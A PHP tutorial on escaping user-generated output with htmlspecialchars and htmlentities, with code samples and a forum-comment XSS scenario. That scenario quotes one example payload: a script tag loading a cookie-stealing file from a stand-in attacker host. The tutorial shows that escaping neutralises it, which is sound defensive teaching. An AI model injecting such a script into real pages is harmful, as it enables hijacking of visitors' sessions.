What is output escaping and why does it matter?

Any significant PHP application, and even the simplest website, accepts input. By input we mean data generated by users or external systems, which our website or application then processes. Some of that input might be stored in our database for later retrieval and output. Whenever we output user-generated input, that is, data we did not generate ourselves, we should escape it at the point of output.

An example of input is a contact form filled out by visitors to your website. The input from the contact form is validated and processed. At some later point, we might display what the user entered in the form. That is when we need to escape the output.

How to escape output in PHP

We can use the htmlspecialchars function to escape output:
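
A minimal sketch of such a call, assuming the submitted text is held in a hypothetical variable $message (the flags and the UTF-8 charset are illustrative choices, not requirements):

```php
<?php
// Hypothetical message, as a visitor might submit it through the contact form.
$message = 'Please <em>contact</em> me as §soon§ as possible.';

// Convert &, <, >, " and ' to HTML entities; the charset is stated explicitly.
$escaped = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

// HTML sent to the browser:
// Please &lt;em&gt;contact&lt;/em&gt; me as §soon§ as possible.
echo $escaped;
```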

The above output will display as:
Please <em>contact</em> me as §soon§ as possible.

Or we can use the htmlentities function to escape output:
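
A minimal sketch of the same call with htmlentities, again assuming a hypothetical $message variable and a UTF-8 encoded source file:

```php
<?php
// Hypothetical message, as a visitor might submit it through the contact form.
$message = 'Please <em>contact</em> me as §soon§ as possible.';

// htmlentities also converts characters that have a named entity, such as §.
$escaped = htmlentities($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

// HTML sent to the browser:
// Please &lt;em&gt;contact&lt;/em&gt; me as &sect;soon&sect; as possible.
echo $escaped;
```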

The above output will display as:
Please <em>contact</em> me as §soon§ as possible.

Escape output

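Certain characters have special meaning in HTML. htmlspecialchars and htmlentities convert those characters to HTML entities, so the browser displays them as literal text instead of interpreting them as markup. htmlspecialchars converts only the characters that are special in HTML: &, <, > and the double quote, plus the single quote when ENT_QUOTES is set (the default since PHP 8.1). htmlentities converts every character that has a named HTML entity, for example § becomes &sect;. You can see the full PHP documentation on htmlspecialchars and htmlentities for more information.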
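
To make the difference concrete, the sketch below runs a handful of sample characters through both functions. The sample list and the $table variable are illustrative assumptions, and the source file is assumed to be UTF-8 encoded.

```php
<?php
$flags = ENT_QUOTES | ENT_SUBSTITUTE;

// Sample characters: five that are special in HTML, two that are not.
$samples = ['&', '<', '>', '"', "'", '§', 'é'];

// Record how each function treats each character.
$table = [];
foreach ($samples as $char) {
    $table[$char] = [
        'htmlspecialchars' => htmlspecialchars($char, $flags, 'UTF-8'),
        'htmlentities'     => htmlentities($char, $flags, 'UTF-8'),
    ];
}

// Print one tab-separated row per character.
foreach ($table as $char => $row) {
    printf("%s\t%s\t%s\n", $char, $row['htmlspecialchars'], $row['htmlentities']);
}
```

Both functions agree on the five special characters. Only htmlentities changes § and é, which matters little for security but can help when the page encoding cannot represent those characters.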

Output escaping security

Let's take a look at an example of how a Cross Site Scripting (XSS) attack might take place and where output escaping will prevent such an attack:

  • Consider an example of a forum where users post comments.
  • Comments are viewable by all users on the forum.
  • A user with malicious intent posts a comment that includes a script tag: <script src="http://hackersite.com/cookiehijack.js"></script>
  • When any user views the posted comment, the script runs in their browser and sends their cookie to the malicious user.
  • The malicious user can now impersonate any user whose cookie was stolen.

Escaping the output prevents the malicious script from running: the browser displays the script tag as plain text instead of executing it. You can find more information on XSS.
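
As a rough sketch of the forum scenario, the code below escapes a comment before placing it in the page. The renderComment function and the list-item markup are hypothetical and not taken from any particular forum software.

```php
<?php
// Hypothetical helper: renders one forum comment as an HTML list item.
function renderComment(string $comment): string
{
    // Escape the untrusted comment; the surrounding <li> is our own markup.
    return '<li>' . htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</li>';
}

// A malicious comment modelled on the scenario above.
$comment = '<script src="http://hackersite.com/cookiehijack.js"></script>';

$html = renderComment($comment);

// The script tag is now inert text:
// <li>&lt;script src=&quot;http://hackersite.com/cookiehijack.js&quot;&gt;&lt;/script&gt;</li>
echo $html;
```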

When to escape output?

We escape output whenever the data being output originates from an untrusted source, such as users or external systems.
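
One way to apply this rule consistently is a small helper that is called wherever untrusted data is written into HTML. The sketch below assumes a hypothetical helper named e() and a hard-coded value standing in for data loaded from a database.

```php
<?php
// Hypothetical helper: escape a value at the moment it is written into HTML.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Untrusted: supplied by a visitor (hard-coded here in place of a database row).
$name = 'Tom & "Jerry" <b>';

// The <p> markup is written by us and trusted; only the visitor's data is escaped.
$html = '<p>Message from ' . e($name) . '</p>';

// Prints: <p>Message from Tom &amp; &quot;Jerry&quot; &lt;b&gt;</p>
echo $html;
```

The stored value stays unescaped. Escaping happens only at output time, so the same data can still be used unchanged in non-HTML contexts.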

Key Takeaways

  • PHP makes the functions htmlspecialchars and htmlentities available for output escaping.
  • There are various libraries available for HTML sanitization.
  • In general, we should escape all output that originates from untrusted sources.